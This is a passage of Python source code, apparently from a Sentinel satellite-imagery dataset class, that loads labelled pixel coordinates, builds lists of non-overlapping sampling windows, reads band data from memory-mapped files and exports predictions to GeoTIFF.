if os.path.isfile(os.path.join(self.path, 'labelled_pixels.npz')):
with np.load(os.path.join(self.path, 'labelled_pixels.npz')) as f:
self.labelled_pixels = np.concatenate( [ np.expand_dims(f['y'],-1), np.expand_dims(f['x'],-1)], -1)
# self.labelled_pixels is matrix of shape [N,2]
self.labelled_pixels = self._remove_edge_pixels(win, self.labelled_pixels)
#Make list of non-overlapping labelled pixels
if win == [0,0]:
self.nolp = np.copy(self.labelled_pixels)
else:
self.nolp = self._make_list_of_non_overlapping_pixels(win)
else:
#When no list with labelled_pixels is provided we assume that all pixels are labelled
#Make list of non-overlapping labelled pixels
if win == [0,0]:
self.nolp = None
else:
y = np.arange(win[0]//2, self.shape[0]-win[0]//2, win[0])
x = np.arange(win[1]//2, self.shape[1]-win[1]//2, win[1] )
y, x = np.meshgrid(y, x, indexing='ij')
# import pdb; pdb.set_trace()
# Select pixels with mask==true
self.nolp = np.concatenate( [np.expand_dims(y.flatten(),1), np.expand_dims(x.flatten(),1)],1)
#Read mapinfo-json file (this is used in export_predictions_to_tif)
mapinfo_file = os.path.join(self.path, "mapinfo.json")
if os.path.isfile(mapinfo_file):
with open(mapinfo_file) as file:
self.map_info = json.load(file)
else:
self.map_info = None
print('Warning: mapinfo.json was not found. Writing predictions to tif will not be possible.')
#Update meta-data
self.meta_data.update({
'path': self.path,
})
#Add information extracted from folder-name
self.meta_data.update(
parse_eodata_folder_name(self.path.strip('/').split('/')[-1]))
#Add tile id
self.tile_id = self.meta_data['tile_id']
#Add filename
self.file_name = self.meta_data["full_name"]
#Check that bands in folder matches bands in meta_data
bands_in_folder = [f.replace(self.data_prefix,'') for f in self._get_memmap_names() if 'data_' in f]
assert(all([band_in_meta.lower() in bands_in_folder for band_in_meta in self.meta_data['bands']]))
def _make_list_of_non_overlapping_pixels(self, win):
"Get list of non-overlapping pixels (nolp) - either load, or make and save"
file_path = os.path.join(self.path, 'nolp' + str(win))
#If exist just load it
if os.path.isfile(file_path + '.npy'):
print(' -', 'Loading list of non-overlapping pixels')
return np.load(file_path+ '.npy')
#Otherwise we make it
else:
print(' ', 'Making list of non-overlapping pixels (this may take some time)')
#Define window
wl = np.array(win) // 2
wr = np.array(win) - wl
tmp_list = np.copy(self.labelled_pixels)
#Loop through and add coordinates
nolp = []
while tmp_list.shape[0] > 0:
coord = np.copy(tmp_list[0, :])
nolp.append(coord)
y, x = coord
# Remove coordinates that overlap with this pixel
overlapping_coords = np.greater(tmp_list[:, 0], y - wl[0]) * \
np.less(tmp_list[:, 0], y + wr[0]) * \
np.greater(tmp_list[:, 1], x - wl[1]) * \
np.less(tmp_list[:, 1], x + wr[1])
overlapping_coords = overlapping_coords.astype('bool')
tmp_list = tmp_list[np.logical_not(overlapping_coords), :]
print(' Samples left:', tmp_list.shape[0])
nolp = np.array(nolp)
np.save(file_path,nolp)
return nolp
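    # --- Editor's sketch (not part of the original file) ----------------------
    # Minimal standalone illustration of the greedy filtering above: keep the
    # first coordinate, drop every remaining coordinate whose window would
    # overlap it, and repeat.  Coordinates and window size are illustrative,
    # and this helper is not part of the original class.
    @staticmethod
    def _example_non_overlapping(coords, win):
        wl = np.array(win) // 2
        wr = np.array(win) - wl
        coords = np.array(coords)
        kept = []
        while coords.shape[0] > 0:
            y, x = coords[0]
            kept.append((int(y), int(x)))
            overlap = (coords[:, 0] > y - wl[0]) & (coords[:, 0] < y + wr[0]) & \
                      (coords[:, 1] > x - wl[1]) & (coords[:, 1] < x + wr[1])
            coords = coords[~overlap]
        return kept
    # Example:
    #   _example_non_overlapping([[10, 10], [11, 11], [30, 30]], [4, 4])
    #   -> [(10, 10), (30, 30)]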
def _remove_edge_pixels(self, win, coordinate_list):
if win ==[0,0]:
return coordinate_list
#Get half window size
wl = np.array(win) // 2
wr = np.array(win) - wl
#Check which pixels that are not close to edge of tile
indexes_within_bounds = np.greater(coordinate_list[:, 0], wl[0]) * \
np.less(coordinate_list[:, 0], self.shape[0] - wr[0]) * \
np.greater(coordinate_list[:, 1], wl[1]) * \
np.less(coordinate_list[:, 1], self.shape[1] - wr[1])
indexes_within_bounds = indexes_within_bounds.astype('bool')
coordinate_list = coordinate_list[indexes_within_bounds, :]
return coordinate_list
def export_prediction_to_tif(self, out_file_path, prediction):
"""
:param out_file_path:
:param prediction: a np-array where second dim indicate n-channels
:return:
"""
#Check if map-info is available
if self.map_info is None:
class MissingMapInfoException(Exception): pass
raise MissingMapInfoException()
#Compute geo-meta data
geo = self.map_info['transform']
transf = rasterio.Affine(geo[1], geo[2], geo[0], geo[4], geo[5], geo[3])
crs = {'init': self.map_info['cs_code']}
#Write to file
with rasterio.open(out_file_path, "w", driver="GTiff", compress="lzw", bigtiff="YES",
height=prediction.shape[0], width=prediction.shape[1], count=prediction.shape[2],
dtype=prediction.dtype,
crs=crs, transform=transf) as out_file:
for band_no in range(0, prediction.shape[2]):
out_file.write(prediction[:,:,band_no], band_no + 1)
print('Exported predictions to', out_file_path)
def get_meta_data(self):
return self.meta_data
def get_data(self, band_identifiers=None):
""" Reads sentinel_dataset from disk and return as a numpy array with dimensions H x W x C where C is number of channels.
This corresponds to the bands specified in band_identifiers."""
        if band_identifiers is None:
            band_identifiers = self.get_meta_data()['bands']
        if not isinstance(band_identifiers, list):
            band_identifiers = [band_identifiers]
return [self._open_memmap(self.data_prefix + b.lower()) for b in band_identifiers]
def get_labels(self, label_identifiers=None):
""" Reads labels from disk and return as a numpy array with dimensions H x W x C where C is number of channels.
This corresponds to the bands specified in band_identifiers."""
        if label_identifiers is None:
            label_identifiers = [l.replace(self.key_prefix_label,'') for l in self._get_memmap_names() if self.key_prefix_label in l]
        if not isinstance(label_identifiers, list):
            label_identifiers = [label_identifiers]
label_identifiers = [self.key_prefix_label + bi.lower() for bi in label_identifiers]
        #Hack to make 'cloud_mask' be accessible as a label
label_identifiers = [li.replace(self.key_prefix_label+self.key_missing_mask, self.key_missing_mask) for li in label_identifiers]
return [self._open_memmap(b.lower()) for b in label_identifiers]
def get_missing_mask(self):
""" Reads and returns cloud mask """
return [np.expand_dims(self._open_memmap(self.key_missing_mask),-1)]
def _get_memmap_names(self):
""" Returns list of .dat files in folder. This correspons to the data bands and label types."""
return [f.replace('.dat','') for f in os.listdir(self.path) if '.dat' in f]
def _open_memmap(self,filename):
fp = np.memmap(os.path.join(self.path, filename+'.dat'), dtype='float32', mode='r', shape=tuple(self.shape))
return fp
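    # --- Editor's sketch (not part of the original file) ----------------------
    # How a band file of this layout could be written and read back with numpy
    # memmaps; the file name and shape below are illustrative only, and this
    # helper is not part of the original class.
    @staticmethod
    def _example_write_and_read_band(path="data_b04.dat", shape=(512, 512)):
        out = np.memmap(path, dtype='float32', mode='w+', shape=shape)
        out[:] = 0.0      # fill with data
        out.flush()       # make sure it is written to disk
        del out
        # read it back read-only, exactly as _open_memmap does
        return np.memmap(path, dtype='float32', mode='r', shape=shape)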
def get_overlapping_coordinate_no(self,no):
if hasattr(self, 'labelled_pixels'):
return self.labelled_pixels[no,:]
else:
            x = no % self.shape[1]
            y = (no - x) // self.shape[1]
return np.array([y,x])
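    # --- Editor's note (not part of the original file) ------------------------
    # The flat-index -> (y, x) conversion above assumes row-major order, so it
    # can be cross-checked against numpy:
    #
    #   shape = (4, 5)
    #   no = 13
    #   np.unravel_index(no, shape)                        # -> (2, 3), i.e. (y, x)
    #   (no % shape[1], (no - no % shape[1]) // shape[1])  # -> (3, 2), i.e. (x, y)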
def get_non_overlapping_coordinate_no(self,no):
return self.nolp[no, :]
def n_non_overlapping(self):
return self.nolp.shape[0]
def n_overlapping(self):
if hasattr(self,'labelled_pixels'):
return self.labelled_pixels.shape[0]
else:
#Assuming all pixels are labelled
return np.prod(self.shape)
def __len__(self):
#todo: Remove this if not needed. We only keep in case it is used somewhere
return self.nolp.shape[0]
| 38.48062
| 136
| 0.592164
|